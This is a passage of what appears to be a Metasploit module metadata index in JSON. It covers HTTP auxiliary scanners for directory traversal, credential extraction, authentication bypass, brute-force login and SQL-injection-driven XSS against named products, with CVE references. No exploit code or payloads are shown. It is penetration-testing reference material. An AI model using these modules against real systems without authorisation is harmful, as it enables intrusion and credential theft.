"ref_name": "scanner/http/joomla_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/kodi_traversal": {
"name": "Kodi 17.0 Local File Inclusion Vulnerability",
"full_name": "auxiliary/scanner/http/kodi_traversal",
"rank": 300,
"disclosure_date": "2017-02-12",
"type": "auxiliary",
"author": [
"Eric Flokstra",
"jvoisin"
],
"description": "This module exploits a directory traversal flaw found in Kodi before 17.1.",
"references": [
"CVE-2017-5982"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/kodi_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/linknat_vos_traversal": {
"name": "Linknat Vos Manager Traversal",
"full_name": "auxiliary/scanner/http/linknat_vos_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to test whether a file traversal vulnerability\n is present in versions of Linknat VOS2009/VOS3000.",
"references": [
"URL-http://www.linknat.com/",
"URL-http://www.wooyun.org/bugs/wooyun-2010-0145458"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linknat_vos_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/linksys_e1500_traversal": {
"name": "Linksys E1500 Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/linksys_e1500_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a directory traversal vulnerability which is present in\n different Linksys home routers, like the E1500.",
"references": [
"URL-http://www.s3cur1ty.de/m1adv2013-004",
"URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml",
"BID-57760",
"OSVDB-89911",
"EDB-24475"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linksys_e1500_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/litespeed_source_disclosure": {
"name": "LiteSpeed Source Code Disclosure/Download",
"full_name": "auxiliary/scanner/http/litespeed_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kingcope",
"xanda"
],
"description": "This module exploits a source code disclosure/download vulnerability in\n versions 4.0.14 and prior of LiteSpeed.",
"references": [
"CVE-2010-2333",
"OSVDB-65476",
"BID-40815",
"EDB-13850"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/litespeed_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/lucky_punch": {
"name": "HTTP Microsoft SQL Injection Table XSS Infection",
"full_name": "auxiliary/scanner/http/lucky_punch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module implements the mass SQL injection attack in\n use lately, which concatenates an HTML string onto stored data and forces a persistent\n XSS attack that redirects the user's browser to an attacker-controlled website.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
"is_install_path": true,
"ref_name": "scanner/http/lucky_punch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/majordomo2_directory_traversal": {
"name": "Majordomo2 _list_file_get() Directory Traversal",
"full_name": "auxiliary/scanner/http/majordomo2_directory_traversal",
"rank": 300,
"disclosure_date": "2011-03-08",
"type": "auxiliary",
"author": [
"Nikolas Sotiriu"
],
"description": "This module exploits a directory traversal vulnerability present in\n the _list_file_get() function of Majordomo2 (help function). By default, this\n module will attempt to download the Majordomo config.pl file.",
"references": [
"OSVDB-70762",
"CVE-2011-0049",
"CVE-2011-0063",
"URL-http://sotiriu.de/adv/NSOADV-2011-003.txt",
"EDB-16103"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/majordomo2_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_desktop_central_login": {
"name": "ManageEngine Desktop Central Login Utility",
"full_name": "auxiliary/scanner/http/manageengine_desktop_central_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to a ManageEngine Desktop Central instance.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_desktop_central_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_deviceexpert_traversal": {
"name": "ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal",
"full_name": "auxiliary/scanner/http/manageengine_deviceexpert_traversal",
"rank": 300,
"disclosure_date": "2012-03-18",
"type": "auxiliary",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in ManageEngine\n DeviceExpert's ScheduleResultViewer Servlet. This is done by using\n \"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\" in the path in order to retrieve a file on a\n vulnerable machine. Please note that the SSL option is required in order to send\n HTTP requests.",
"references": [
"OSVDB-80262"
],
"platform": "",
"arch": "",
"rport": 6060,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_deviceexpert_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_deviceexpert_user_creds": {
"name": "ManageEngine DeviceExpert User Credentials",
"full_name": "auxiliary/scanner/http/manageengine_deviceexpert_user_creds",
"rank": 300,
"disclosure_date": "2014-08-28",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module extracts usernames and salted MD5 password hashes\n from ManageEngine DeviceExpert version 5.9 build 5980 and prior.\n\n This module has been tested successfully on DeviceExpert\n version 5.9.7 build 5970.",
"references": [
"EDB-34449",
"OSVDB-110522",
"CVE-2014-5377"
],
"platform": "",
"arch": "",
"rport": 6060,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/manageengine_securitymanager_traversal": {
"name": "ManageEngine SecurityManager Plus 5.5 Directory Traversal",
"full_name": "auxiliary/scanner/http/manageengine_securitymanager_traversal",
"rank": 300,
"disclosure_date": "2012-10-19",
"type": "auxiliary",
"author": [
"blkhtc0rp",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal flaw found in ManageEngine\n SecurityManager Plus 5.5 or less. When handling a file download request,\n the DownloadServlet class fails to properly check the 'f' parameter, which\n can be abused to read any file outside the virtual directory.",
"references": [
"OSVDB-86563",
"EDB-22092"
],
"platform": "",
"arch": "",
"rport": 6262,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/manageengine_securitymanager_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mediawiki_svg_fileaccess": {
"name": "MediaWiki SVG XML Entity Expansion Remote File Access",
"full_name": "auxiliary/scanner/http/mediawiki_svg_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel Franke",
"juan vazquez <juan.vazquez@metasploit.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module attempts to read a remote file from the server using a vulnerability\n in the way MediaWiki handles SVG files. The vulnerability occurs while trying to\n expand external entities with the SYSTEM identifier. In order to work MediaWiki must\n be configured to accept upload of SVG files. If anonymous uploads are allowed the\n username and password aren't required, otherwise they are. This module has been\n tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10.\n Older versions were also tested but do not seem to be affected by this vulnerability.\n The following MediaWiki requirements must be met: File upload must be enabled,\n $wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something\n other than 'false'.",
"references": [
"OSVDB-92490",
"URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=46859",
"URL-http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/mediawiki_svg_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/meteocontrol_weblog_extractadmin": {
"name": "Meteocontrol WEBlog Password Extractor",
"full_name": "auxiliary/scanner/http/meteocontrol_weblog_extractadmin",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract the Administrator password for the device management portal.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01",
"CVE-2016-2296",
"CVE-2016-2298"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
"is_install_path": true,
"ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mod_negotiation_brute": {
"name": "Apache HTTPD mod_negotiation Filename Bruter",
"full_name": "auxiliary/scanner/http/mod_negotiation_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"diablohorn <diablohorn@gmail.com>"
],
"description": "This module performs a brute force attack in order to discover existing files on a\n server which uses mod_negotiation. If the filename is found, the IP address and the\n files found will be displayed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
"is_install_path": true,
"ref_name": "scanner/http/mod_negotiation_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mod_negotiation_scanner": {
"name": "Apache HTTPD mod_negotiation Scanner",
"full_name": "auxiliary/scanner/http/mod_negotiation_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"diablohorn <diablohorn@gmail.com>"
],
"description": "This module scans the webserver of the given host(s) for the existence of mod_negotiation.\n If the webserver has mod_negotiation enabled, the IP address will be displayed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/mod_negotiation_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ms09_020_webdav_unicode_bypass": {
"name": "MS09-020 IIS6 WebDAV Unicode Authentication Bypass",
"full_name": "auxiliary/scanner/http/ms09_020_webdav_unicode_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to bypass authentication using the WebDAV IIS6\n Unicode vulnerability discovered by Kingcope. The vulnerability appears\n to be exploitable where WebDAV is enabled on the IIS6 server, and any\n protected folder requires either Basic, Digest or NTLM authentication.",
"references": [
"MSB-MS09-020",
"CVE-2009-1535",
"CVE-2009-1122",
"OSVDB-54555",
"BID-34993"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ms15_034_http_sys_memory_dump": {
"name": "MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure",
"full_name": "auxiliary/scanner/http/ms15_034_http_sys_memory_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Whitcroft <rwhitcroft@gmail.com>",
"sinn3r <sinn3r@metasploit.com>",
"Sunny Neo <sunny.neo@centurioninfosec.sg>"
],
"description": "This module dumps memory contents using a crafted Range header and affects only\n Windows 8.1, Server 2012, and Server 2012R2. Note that if the target\n is running in VMware Workstation, this module has a high likelihood\n of resulting in BSOD; however, VMware ESX and non-virtualized hosts\n seem stable. Using a larger target file should result in more memory\n being dumped, and SSL seems to produce more data as well.",
"references": [
"CVE-2015-1635",
"MSB-MS15-034",
"URL-http://pastebin.com/ypURDPc4",
"URL-https://github.com/rapid7/metasploit-framework/pull/5150",
"URL-https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection",
"URL-http://www.securitysift.com/an-analysis-of-ms15-034/",
"URL-http://securitysift.com/an-analysis-of-ms15-034/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-21 12:31:56 +0000",
"path": "/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/ms15_034_http_sys_memory_dump",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/mybook_live_login": {
"name": "Western Digital MyBook Live Login Utility",
"full_name": "auxiliary/scanner/http/mybook_live_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module simply attempts to login to a Western Digital MyBook Live instance using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/mybook_live_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/netdecision_traversal": {
"name": "NetDecision NOCVision Server Directory Traversal",
"full_name": "auxiliary/scanner/http/netdecision_traversal",
"rank": 300,
"disclosure_date": "2012-03-07",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in NetDecision's\n TrafficGrapherServer.exe service. This is done by using \"...\\\" in\n the path to retrieve a file on a vulnerable machine.",
"references": [
"CVE-2012-1465",
"OSVDB-79863",
"URL-http://aluigi.altervista.org/adv/netdecision_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 8087,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/netdecision_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/netgear_sph200d_traversal": {
"name": "Netgear SPH200D Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/netgear_sph200d_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a directory traversal vulnerability which is present in\n the Netgear SPH200D Skype telephone.",
"references": [
"BID-57660",
"EDB-24441",
"URL-http://support.netgear.com/product/SPH200D",
"URL-http://www.s3cur1ty.de/m1adv2013-002"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/netgear_sph200d_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/nginx_source_disclosure": {
"name": "Nginx Source Code Disclosure/Download",
"full_name": "auxiliary/scanner/http/nginx_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits a source code disclosure/download vulnerability in\n versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40\n correct this vulnerability.",
"references": [
"CVE-2010-2263",
"OSVDB-65531",
"BID-40760",
"EDB-13818",
"EDB-13822"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/nginx_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_file_reporter_fsfui_fileaccess": {
"name": "NFR Agent FSFUI Record Arbitrary Remote File Access",
"full_name": "auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n with an FSFUI record with UICMD 126. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).",
"references": [
"CVE-2012-4958",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_file_reporter_srs_fileaccess": {
"name": "NFR Agent SRS Record Arbitrary Remote File Access",
"full_name": "auxiliary/scanner/http/novell_file_reporter_srs_fileaccess",
"rank": 300,
"disclosure_date": "2012-11-16",
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n CMD 103, specifying a full pathname. This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).",
"references": [
"CVE-2012-4957",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
],
"platform": "",
"arch": "",
"rport": 3037,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
3037
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/novell_mdm_creds": {
"name": "Novell Zenworks Mobile Device Management Admin Credentials",
"full_name": "auxiliary/scanner/http/novell_mdm_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"steponequit",
"Andrea Micalizzi (aka rgod)"
],
"description": "This module attempts to pull the administrator credentials from\n a vulnerable Novell Zenworks MDM server.",
"references": [
"CVE-2013-1081",
"OSVDB-91119",
"URL-http://www.novell.com/support/kb/doc.php?id=7011895"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/novell_mdm_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ntlm_info_enumeration": {
"name": "Host Information Enumeration via NTLM Authentication",
"full_name": "auxiliary/scanner/http/ntlm_info_enumeration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Brandon Knight"
],
"description": "This module makes requests to resources on the target server in\n an attempt to find resources which permit NTLM authentication. For\n resources which permit NTLM authentication, a blank NTLM type 1 message\n is sent to enumerate a type 2 message from the target server. The type\n 2 message is then parsed for information such as the Active Directory\n domain and NetBIOS name. A single URI can be specified with TARGET_URI\n and/or a file of URIs can be specified with TARGET_URIS_FILE (default).",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
"is_install_path": true,
"ref_name": "scanner/http/ntlm_info_enumeration",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/octopusdeploy_login": {
"name": "Octopus Deploy Login Utility",
"full_name": "auxiliary/scanner/http/octopusdeploy_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module simply attempts to login to an Octopus Deploy server using a specific\n username and password. It has been confirmed to work on version 3.4.4.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/octopusdeploy_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/open_proxy": {
"name": "HTTP Open Proxy Detection",
"full_name": "auxiliary/scanner/http/open_proxy",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Checks if an HTTP proxy is open. False positives are avoided by\n verifying the HTTP return code and matching a pattern.\n For the CONNECT method, only the return code is verified.\n HTTP headers that indicate the use of a proxy or load balancer are shown.",
"references": [
"URL-http://en.wikipedia.org/wiki/Open_proxy",
"URL-http://nmap.org/svn/scripts/http-open-proxy.nse"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/open_proxy.rb",
"is_install_path": true,
"ref_name": "scanner/http/open_proxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/openmind_messageos_login": {
"name": "OpenMind Message-OS Portal Login Brute Force Utility",
"full_name": "auxiliary/scanner/http/openmind_messageos_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for the OpenMind Message-OS provisioning web login portal, and\n performs a login brute force attack to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/openmind_messageos_login",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/options": {
"name": "HTTP Options Detection",
"full_name": "auxiliary/scanner/http/options",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "Display available HTTP options for each system",
"references": [
"CVE-2005-3398",
"CVE-2005-3498",
"OSVDB-877",
"BID-11604",
"BID-9506",
"BID-9561"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/options.rb",
"is_install_path": true,
"ref_name": "scanner/http/options",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/oracle_demantra_database_credentials_leak": {
"name": "Oracle Demantra Database Credentials Leak",
"full_name": "auxiliary/scanner/http/oracle_demantra_database_credentials_leak",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Oliver Gruskovnjak"
],
"description": "This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in\n combination with an authentication bypass. This way an unauthenticated user can retrieve\n the database name, username and password on any vulnerable machine.",
"references": [
"CVE-2013-5795",
"CVE-2013-5880",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5795/",
"URL-https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
